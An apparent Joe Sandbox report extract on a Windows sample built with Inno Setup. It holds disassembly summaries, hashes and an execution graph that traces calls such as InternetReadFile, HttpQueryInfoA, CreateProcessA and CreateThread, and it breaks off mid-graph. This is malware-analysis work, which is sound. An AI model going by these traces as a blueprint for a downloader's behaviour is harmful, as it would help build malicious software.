                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ActiveCurrentThreadWindow
                                          • String ID: L
                                          • API String ID: 1335379141-2909332022
                                          • Opcode ID: dde8404dfa06f7440ff49d778366eea8e33d68dac2129b96da576e60149b55c1
                                          • Instruction ID: ba71598d2f393434b0e99db4b532341471b8ac22d8944c6b47070d72b39e1203
                                          • Opcode Fuzzy Hash: dde8404dfa06f7440ff49d778366eea8e33d68dac2129b96da576e60149b55c1
                                          • Instruction Fuzzy Hash: CA310E71900348AFDF11DFA6C8915DEBBB8EB49704F0184AAE904A7681DB785A04CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00403DEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403E26
                                            • Part of subcall function 00403DEC: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403E31
                                          • SysFreeString.OLEAUT32(?), ref: 00447596
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: String$AllocByteCharFreeMultiWide
                                          • String ID: NIL Interface Exception$Unknown Method
                                          • API String ID: 3952431833-1023667238
                                          • Opcode ID: 65763d5aad74e0db49a0dd09087323ef94750999bde3a1973c339012d0364a9c
                                          • Instruction ID: 904846feee96eb5d243ebb56e4b0f3edd67b582151c079b437bfe0108e5b6a29
                                          • Opcode Fuzzy Hash: 65763d5aad74e0db49a0dd09087323ef94750999bde3a1973c339012d0364a9c
                                          • Instruction Fuzzy Hash: 1B11B770A08204AFE710EFA58C81A6EBABCEB09704F91407EF500E7681C7799904C729
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CF47180.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00489434,?,00489428,00000000,0048940F), ref: 004893DA
                                          • CloseHandle.KERNEL32(00489C00,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00489434,?,00489428,00000000), ref: 004893F1
                                            • Part of subcall function 004892C4: GetLastError.KERNEL32(00000000,0048935C,?,?,?,?), ref: 004892E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseErrorF47180HandleLast
                                          • String ID: D
                                          • API String ID: 1518912886-2746444292
                                          • Opcode ID: e79b9ecf8d0fbe05fd8aac1f9beae76a65c4d50c8133bd11e1f1fc5bf30d756a
                                          • Instruction ID: 8a602a59bd543ca9148e4aba1d84fa657435f2b2be7756fef3cd3a4e41c96cac
                                          • Opcode Fuzzy Hash: e79b9ecf8d0fbe05fd8aac1f9beae76a65c4d50c8133bd11e1f1fc5bf30d756a
                                          • Instruction Fuzzy Hash: 42015EB1604608AFDB04EBA5CC42EAE77ACDF08714F55447AF904E72C1D6789E018A68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DC10
                                          • RegEnumValueA.ADVAPI32 ref: 0042DC50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Value$EnumQuery
                                          • String ID: Inno Setup: No Icons
                                          • API String ID: 1576479698-2016326496
                                          • Opcode ID: c530550c5b400f27d3b354827e66c455718bdea8dfe3a8ec58b02f593ba09778
                                          • Instruction ID: a380a1bc47b6b2e444766c5ac2e74b614384efc47358369cee9a4f1bd1172e85
                                          • Opcode Fuzzy Hash: c530550c5b400f27d3b354827e66c455718bdea8dfe3a8ec58b02f593ba09778
                                          • Instruction Fuzzy Hash: 6701F7B1F4532069F73085126C45B7B568C8B82B64F64013BF940A63C0D6D89C04E2AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406FE4: 6CAD5F60.KERNEL32(00000000,0048D628,0048B356,00000000,0048B3AB,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406FEF
                                          • 6CAD6060.KERNEL32(00000000,00000000,00000001,004AE064,?,0046D676,?,00000000,0046D705,?,00000000,0046D908,?,00000000,0046D962), ref: 0046D0C6
                                            • Part of subcall function 0046CF18: GetLastError.KERNEL32(00000000,0046D004,?,?,?,004AE048,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0046D08B,00000001), ref: 0046CF39
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D6060ErrorLast
                                          • String ID: DeleteFile$MoveFile
                                          • API String ID: 581812409-139070271
                                          • Opcode ID: 3286add737261da9596020d0779331a5a2dead55cbf0c9684a5df42f0ff127d7
                                          • Instruction ID: 86e1435b28abd71ebb250fdb3f6b7c45ff8f6c329ae4cfdc01409c1855dba219
                                          • Opcode Fuzzy Hash: 3286add737261da9596020d0779331a5a2dead55cbf0c9684a5df42f0ff127d7
                                          • Instruction Fuzzy Hash: 5BF0AF60E0411066DE14BB6A8542A5A33888F0239DF10417FF9906F3C3EA2E9C0682AF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0044DD4C: InvalidateRect.USER32(00000000,00000001,00000001), ref: 0044DDC2
                                          • NotifyWinEvent.USER32(0000800A,00000000,000000FC,?), ref: 0044E0F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: EventInvalidateNotifyRect
                                          • String ID: FD$`,v
                                          • API String ID: 4137399111-3926226564
                                          • Opcode ID: 868f51c89105054003320aea82aadd4cb8c344df814fcc8ff0cc142b6db144a2
                                          • Instruction ID: e76815fa4295d63e633f3cb5cd5ab01292fbb66bdbdbaac571db2888ea7d0737
                                          • Opcode Fuzzy Hash: 868f51c89105054003320aea82aadd4cb8c344df814fcc8ff0cc142b6db144a2
                                          • Instruction Fuzzy Hash: A5F0F030701624AFE311DF1DC88988EBFE4EF08361B008186F8588B361C7B4DE40CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,AUTOMATION,00000001,00000000,00431610,00000000,00431666,?,?,004313FC,00000001,00000000,00000000), ref: 0040286D
                                          • GetCommandLineA.KERNEL32(AUTOMATION,00000001,00000000,00431610,00000000,00431666,?,?,004313FC,00000001,00000000,00000000,?,0043209C), ref: 0040287F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CommandFileLineModuleName
                                          • String ID: AUTOMATION
                                          • API String ID: 2151003578-3270279633
                                          • Opcode ID: 68efeb646be0e363d0f0ae53914f55a7e0e3c363f158dbac0d7dd3307158ec53
                                          • Instruction ID: daee7366679174b5276f86a0a27228b54be5a9370ddee46f5c897b3a8adc4376
                                          • Opcode Fuzzy Hash: 68efeb646be0e363d0f0ae53914f55a7e0e3c363f158dbac0d7dd3307158ec53
                                          • Instruction Fuzzy Hash: C5F0E52B70061227D22071AE098576B21CD8BC4754F18423BB648F73C0EEFCCC41429F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCommandLineA.KERNEL32(00000000,i,?,AUTOMATION,004313FC,00000001,00000000,?,004315FB,00000000,00431666,?,?,004313FC,00000001,00000000), ref: 00402802
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CommandLine
                                          • String ID: AUTOMATION$i
                                          • API String ID: 3253501508-2573797198
                                          • Opcode ID: ae67477c744024a6e7c2ac692df6760e5d4b638f78726258859dcd5773796150
                                          • Instruction ID: 1d02eac51ef4009498f5db1f058e76f7186e7b059260ff6a50aebf8a4045dc95
                                          • Opcode Fuzzy Hash: ae67477c744024a6e7c2ac692df6760e5d4b638f78726258859dcd5773796150
                                          • Instruction Fuzzy Hash: D0F0E23A200208AFD711EA61CE06A5A76ACEB49704FA18476B800B31D1D2FC1E04C198
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorLastSleep
                                          • String ID:
                                          • API String ID: 1458359878-0
                                          • Opcode ID: a67b913468619f692699f25cfc5b73161d32ff8f76a631e4438fbb84d4302c51
                                          • Instruction ID: 07c7f71cbc58125a37242bf32ec339fedd4e6aab040e1fd147ef6d31c3ced231
                                          • Opcode Fuzzy Hash: a67b913468619f692699f25cfc5b73161d32ff8f76a631e4438fbb84d4302c51
                                          • Instruction Fuzzy Hash: CCF09032A04714669A20A9AB888796FB2DCDBA53A7710412BFC04D7203C538DE4946A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:7.5%
                                          Dynamic/Decrypted Code Coverage:0.6%
                                          Signature Coverage:8.1%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:25
                                          execution_graph 33813 401b30 33814 401b99 InternetSetFilePointer InternetReadFile 33813->33814 33815 401c2d __fread_nolock 33814->33815 33816 401c52 HttpQueryInfoA 33815->33816 33817 401fd5 33816->33817 33818 401c76 CoCreateInstance 33816->33818 33870 40ebbf 33817->33870 33818->33817 33821 401caf 33818->33821 33820 402000 33821->33817 33841 4026b0 33821->33841 33823 401d0c MultiByteToWideChar 33856 40ee0d 33823->33856 33825 401d5e MultiByteToWideChar 33826 401dc0 33825->33826 33826->33826 33867 402550 27 API calls 4 library calls 33826->33867 33828 401eb0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 33832 40ee0d 27 API calls 33828->33832 33834 401fa1 33828->33834 33829 401ddc 33829->33828 33830 402006 33829->33830 33877 413527 33830->33877 33835 401ee7 33832->33835 33834->33817 33835->33834 33836 40ee0d 27 API calls 33835->33836 33840 401f74 33835->33840 33837 401f64 33836->33837 33868 401760 25 API calls 4 library calls 33837->33868 33869 401760 25 API calls 4 library calls 33840->33869 33845 4026ce _Yarn 33841->33845 33846 4026f4 33841->33846 33842 4027de 33893 401950 27 API calls 33842->33893 33844 4027e3 33894 4018b0 27 API calls 2 library calls 33844->33894 33845->33823 33846->33842 33848 402748 33846->33848 33849 40276d 33846->33849 33848->33844 33882 40edcf 33848->33882 33851 40edcf std::_Facet_Register 27 API calls 33849->33851 33853 402759 _Yarn 33849->33853 33850 4027e8 33851->33853 33854 4027c0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 33853->33854 33855 413527 25 API calls 33853->33855 33854->33823 33855->33842 33857 40edcf 33856->33857 33858 4162ee _Yarn 15 API calls 33857->33858 33859 40edee 33857->33859 33862 4018b0 Concurrency::cancel_current_task 33857->33862 33909 41a10c EnterCriticalSection LeaveCriticalSection std::_Facet_Register 33857->33909 33858->33857 33859->33825 33861 40edfa 33861->33861 33862->33861 33907 41044b RaiseException 33862->33907 33864 4018cc 33908 40ff71 26 API calls 3 library calls 33864->33908 33866 4018f3 33866->33825 33867->33829 33868->33840 33869->33834 33871 40ebc7 33870->33871 33872 40ebc8 IsProcessorFeaturePresent 33870->33872 33871->33820 33874 40ec0f 33872->33874 33910 40ebd2 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33874->33910 33876 40ecf2 33876->33820 33911 4134b3 25 API calls 3 library calls 33877->33911 33879 413536 33912 413544 11 API calls __InternalCxxFrameHandler 33879->33912 33881 413543 33886 40edd4 33882->33886 33884 40edee 33884->33853 33886->33884 33888 4018b0 Concurrency::cancel_current_task 33886->33888 33897 41a10c EnterCriticalSection LeaveCriticalSection std::_Facet_Register 33886->33897 33898 4162ee 33886->33898 33887 40edfa 33887->33887 33888->33887 33895 41044b RaiseException 33888->33895 33890 4018cc 33896 40ff71 26 API calls 3 library calls 33890->33896 33892 4018f3 33892->33853 33894->33850 33895->33890 33896->33892 33897->33886 33903 41ed2f _free 33898->33903 33899 41ed6d 33906 4135f1 14 API calls _free 33899->33906 33901 41ed58 RtlAllocateHeap 33902 41ed6b 33901->33902 33901->33903 33902->33886 33903->33899 33903->33901 33905 41a10c EnterCriticalSection LeaveCriticalSection std::_Facet_Register 33903->33905 33905->33903 33906->33902 33907->33864 33908->33866 33909->33857 33910->33876 33911->33879 33912->33881 33913 100069b0 33916 10008701 33913->33916 33915 100069c8 33917 1000870c RtlFreeHeap 33916->33917 33921 10008735 __dosmaperr 33916->33921 33918 10008721 33917->33918 33917->33921 33922 10006406 14 API calls __strnicoll 33918->33922 33920 10008727 GetLastError 33920->33921 33921->33915 33922->33920 33923 41a5f1 33924 41a5fa 33923->33924 33927 41a610 33923->33927 33924->33927 33929 41a61d 33924->33929 33926 41a607 33926->33927 33942 41a76f 15 API calls 2 library calls 33926->33942 33930 41a626 33929->33930 33931 41a629 33929->33931 33930->33926 33943 424883 33931->33943 33936 41a63b 33963 41e2b8 14 API calls _free 33936->33963 33939 41a646 33962 41e2b8 14 API calls _free 33939->33962 33940 41a66a 33940->33926 33942->33927 33944 41a630 33943->33944 33945 42488c 33943->33945 33949 424b90 GetEnvironmentStringsW 33944->33949 33964 41cc20 38 API calls 2 library calls 33945->33964 33947 4248af 33965 4246cf 48 API calls 3 library calls 33947->33965 33950 424ba7 33949->33950 33951 424bfd 33949->33951 33966 420094 33950->33966 33952 424c06 FreeEnvironmentStringsW 33951->33952 33953 41a635 33951->33953 33952->33953 33953->33936 33961 41a670 25 API calls 3 library calls 33953->33961 33955 424bc0 33955->33951 33969 41ed2f 33955->33969 33958 424be8 33976 41e2b8 14 API calls _free 33958->33976 33959 420094 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 33959->33958 33961->33939 33962->33936 33963->33940 33964->33947 33965->33944 33967 4200ab WideCharToMultiByte 33966->33967 33967->33955 33970 41ed6d 33969->33970 33974 41ed3d _free 33969->33974 33978 4135f1 14 API calls _free 33970->33978 33972 41ed58 RtlAllocateHeap 33973 41ed6b 33972->33973 33972->33974 33973->33958 33973->33959 33974->33970 33974->33972 33977 41a10c EnterCriticalSection LeaveCriticalSection std::_Facet_Register 33974->33977 33976->33951 33977->33974 33978->33973 33979 40f323 33984 40f789 SetUnhandledExceptionFilter 33979->33984 33981 40f328 33985 41c6d8 25 API calls 2 library calls 33981->33985 33983 40f333 33984->33981 33985->33983 33986 40f335 33987 40f341 CallCatchBlock 33986->33987 34014 40f095 33987->34014 33989 40f348 33990 40f49b 33989->33990 34001 40f372 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler ___scrt_release_startup_lock 33989->34001 34138 40f5f5 4 API calls 2 library calls 33990->34138 33992 40f4a2 34139 417cad 33992->34139 33996 40f4b0 33997 40f391 33998 40f412 34022 40f710 33998->34022 34001->33997 34001->33998 34134 417c87 38 API calls 4 library calls 34001->34134 34006 40f42d 34135 40f746 GetModuleHandleW 34006->34135 34008 40f434 34008->33992 34009 40f438 34008->34009 34010 40f441 34009->34010 34136 417c62 24 API calls __InternalCxxFrameHandler 34009->34136 34137 40f206 74 API calls ___scrt_uninitialize_crt 34010->34137 34013 40f449 34013->33997 34015 40f09e 34014->34015 34143 40f7f3 IsProcessorFeaturePresent 34015->34143 34017 40f0aa 34144 411b66 10 API calls 2 library calls 34017->34144 34019 40f0af 34020 40f0b3 34019->34020 34145 411b85 7 API calls 2 library calls 34019->34145 34020->33989 34146 410b00 34022->34146 34024 40f723 GetStartupInfoW 34025 40f418 34024->34025 34026 41adaa 34025->34026 34027 424883 48 API calls 34026->34027 34028 41adb3 34027->34028 34030 40f420 34028->34030 34148 424b28 38 API calls 34028->34148 34031 4096f0 34030->34031 34149 418873 GetSystemTimeAsFileTime 34031->34149 34033 409742 34151 417e17 34033->34151 34036 4026b0 27 API calls 34037 40977b __fread_nolock 34036->34037 34154 40c400 34037->34154 34042 409ee3 34318 40dff9 RaiseException Concurrency::cancel_current_task 34042->34318 34043 40985e 34046 409891 34043->34046 34047 40986a 34043->34047 34055 40987b _Yarn 34043->34055 34045 409ee8 34319 4018b0 27 API calls 2 library calls 34045->34319 34048 40edcf std::_Facet_Register 27 API calls 34046->34048 34047->34045 34051 409875 34047->34051 34048->34055 34053 40edcf std::_Facet_Register 27 API calls 34051->34053 34052 409eed 34320 409f60 39 API calls 2 library calls 34052->34320 34053->34055 34054 409954 34090 4099d3 34054->34090 34096 409a52 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34054->34096 34222 40ef48 6 API calls 34054->34222 34056 409f53 34055->34056 34219 40d710 27 API calls 34055->34219 34060 413527 25 API calls 34056->34060 34059 40bb90 69 API calls 34063 409905 34059->34063 34067 409f58 34060->34067 34063->34054 34063->34059 34220 40d030 69 API calls 3 library calls 34063->34220 34221 40d710 27 API calls 34063->34221 34065 409f01 34321 402510 34065->34321 34066 409fc7 34073 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34066->34073 34067->34066 34360 40ef48 6 API calls 34067->34360 34068 409adf 34088 409b0a 34068->34088 34227 40f25b 28 API calls 34068->34227 34069 40999e 34069->34090 34223 40f25b 28 API calls 34069->34223 34072 4026b0 27 API calls 34079 409a4a 34072->34079 34080 409fda 34073->34080 34075 4026b0 27 API calls 34091 409b72 34075->34091 34077 409f99 34077->34066 34361 40f25b 28 API calls 34077->34361 34078 409afd 34228 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34078->34228 34079->34096 34225 40ce50 27 API calls 3 library calls 34079->34225 34080->34006 34081 4099c6 34224 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34081->34224 34086 409f20 34326 402440 34086->34326 34088->34075 34090->34072 34104 409bec 34091->34104 34105 409c5b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34091->34105 34229 40ef48 6 API calls 34091->34229 34093 409fbd 34362 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34093->34362 34094 409f2b 34098 417cad 24 API calls 34094->34098 34096->34056 34096->34088 34226 40ef48 6 API calls 34096->34226 34101 409f32 34098->34101 34099 409d12 34099->34101 34102 409d31 34099->34102 34100 409bb6 34100->34104 34230 40f25b 28 API calls 34100->34230 34334 4054c0 GetCurrentProcessId 34101->34334 34106 409f37 34102->34106 34112 409d37 34102->34112 34108 4026b0 27 API calls 34104->34108 34105->34052 34105->34056 34105->34099 34170 40bb90 34106->34170 34108->34105 34109 409bdf 34231 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34109->34231 34114 409dd8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34112->34114 34118 409d79 34112->34118 34119 409d64 34112->34119 34114->34056 34316 40a510 69 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34114->34316 34115 409e3e std::ios_base::_Ios_base_dtor 34317 40b930 25 API calls 2 library calls 34115->34317 34116 409f4e 34186 409500 34116->34186 34118->34114 34122 409da5 34118->34122 34232 417df6 34119->34232 34125 417df6 38 API calls 34122->34125 34123 409e8d 34123->34056 34126 409eb9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34123->34126 34124 409d69 Sleep 34129 40bb90 69 API calls 34124->34129 34125->34124 34128 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34126->34128 34130 409eda 34128->34130 34131 409dd0 34129->34131 34130->34006 34235 408d00 34131->34235 34134->33998 34135->34008 34136->34010 34137->34013 34138->33992 36552 417b4b 34139->36552 34142 417c71 24 API calls __InternalCxxFrameHandler 34142->33996 34143->34017 34144->34019 34145->34020 34147 410b17 34146->34147 34147->34024 34147->34147 34148->34028 34150 4188a5 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 34149->34150 34150->34033 34363 41cb63 GetLastError 34151->34363 34403 404360 34154->34403 34156 40c479 34157 40edcf std::_Facet_Register 27 API calls 34156->34157 34158 40c480 34157->34158 34412 40e286 34158->34412 34160 40c49a 34424 40c590 34160->34424 34162 409800 34165 40c330 34162->34165 34164 404360 27 API calls 34164->34162 34166 40edcf std::_Facet_Register 27 API calls 34165->34166 34167 40c36a 34166->34167 34168 40e286 std::locale::_Init 44 API calls 34167->34168 34169 409832 34168->34169 34169->34042 34169->34043 34171 40bbbb 34170->34171 34172 40bbc2 34171->34172 34173 40bc14 34171->34173 34174 40bbf5 34171->34174 34172->34116 34177 40edcf std::_Facet_Register 27 API calls 34173->34177 34178 40bc09 _Yarn 34173->34178 34175 40bc4a 34174->34175 34176 40bbfc 34174->34176 34472 4018b0 27 API calls 2 library calls 34175->34472 34180 40edcf std::_Facet_Register 27 API calls 34176->34180 34177->34178 34178->34116 34181 40bc02 34180->34181 34181->34178 34182 413527 25 API calls 34181->34182 34183 40bc54 34182->34183 34473 40a510 69 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34183->34473 34185 40bc6b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34185->34116 34187 418873 GetSystemTimeAsFileTime 34186->34187 34188 40953a 34187->34188 34189 417e17 38 API calls 34188->34189 34194 409543 34189->34194 34190 4095ef CreateThread Sleep 34191 402510 27 API calls 34190->34191 36467 4056a0 34190->36467 34192 40961f 34191->34192 34474 405ea0 34192->34474 34194->34190 34857 40b520 99 API calls 34194->34857 34195 409631 34196 402440 25 API calls 34195->34196 34199 409640 34196->34199 34198 4095e8 34200 417cad 24 API calls 34198->34200 34479 404840 34199->34479 34200->34190 34208 40967b 34209 402510 27 API calls 34208->34209 34218 4096a9 34208->34218 34213 40969a 34209->34213 34210 40bb90 69 API calls 34211 4096ba 34210->34211 34212 408d00 252 API calls 34211->34212 34214 4096bf 34212->34214 34849 4066a0 CreateProcessA 34213->34849 34215 4054c0 47 API calls 34214->34215 34217 4096c7 34215->34217 34218->34210 34219->34063 34220->34063 34221->34063 34222->34069 34223->34081 34224->34090 34225->34096 34226->34068 34227->34078 34228->34088 34229->34100 34230->34109 34231->34104 34233 41cb63 __Getctype 38 API calls 34232->34233 34234 417dfb 34233->34234 34234->34124 34236 405f40 47 API calls 34235->34236 34237 408d3a 34236->34237 34238 408d44 34237->34238 34239 408d6a 34237->34239 34238->34239 34242 417df6 38 API calls 34238->34242 34240 401960 27 API calls 34239->34240 34241 408d7d 34240->34241 34243 409340 39 API calls 34241->34243 34244 408d55 Sleep 34242->34244 34246 408d86 34243->34246 34245 405f40 47 API calls 34244->34245 34245->34238 34247 402510 27 API calls 34246->34247 34248 408d99 34247->34248 34249 409290 39 API calls 34248->34249 34250 408da4 34249->34250 34251 402510 27 API calls 34250->34251 34252 408db7 34251->34252 34253 4091e0 39 API calls 34252->34253 34254 408dc2 34253->34254 34255 402510 27 API calls 34254->34255 34256 408dd5 34255->34256 34257 40c930 27 API calls 34256->34257 34258 408dea 34257->34258 34259 40c990 27 API calls 34258->34259 34260 408e02 34259->34260 34261 40ca40 27 API calls 34260->34261 34262 408e17 34261->34262 34263 40ca40 27 API calls 34262->34263 34264 408e2c 34263->34264 34265 40c990 27 API calls 34264->34265 34266 408e42 34265->34266 34267 402440 25 API calls 34266->34267 34268 408e50 34267->34268 34269 402440 25 API calls 34268->34269 34270 408e5b 34269->34270 34271 402440 25 API calls 34270->34271 34272 408e66 34271->34272 34273 402440 25 API calls 34272->34273 34274 408e71 34273->34274 34275 402440 25 API calls 34274->34275 34276 408e7c 34275->34276 34277 402440 25 API calls 34276->34277 34278 408e87 34277->34278 34279 402440 25 API calls 34278->34279 34286 408e96 34279->34286 34280 408eef 34281 408f18 Sleep 34280->34281 34282 417df6 38 API calls 34280->34282 34289 402440 25 API calls 34280->34289 34281->34286 34283 408f04 Sleep 34282->34283 34283->34286 34284 402510 27 API calls 34284->34286 34285 408f2b 34287 402440 25 API calls 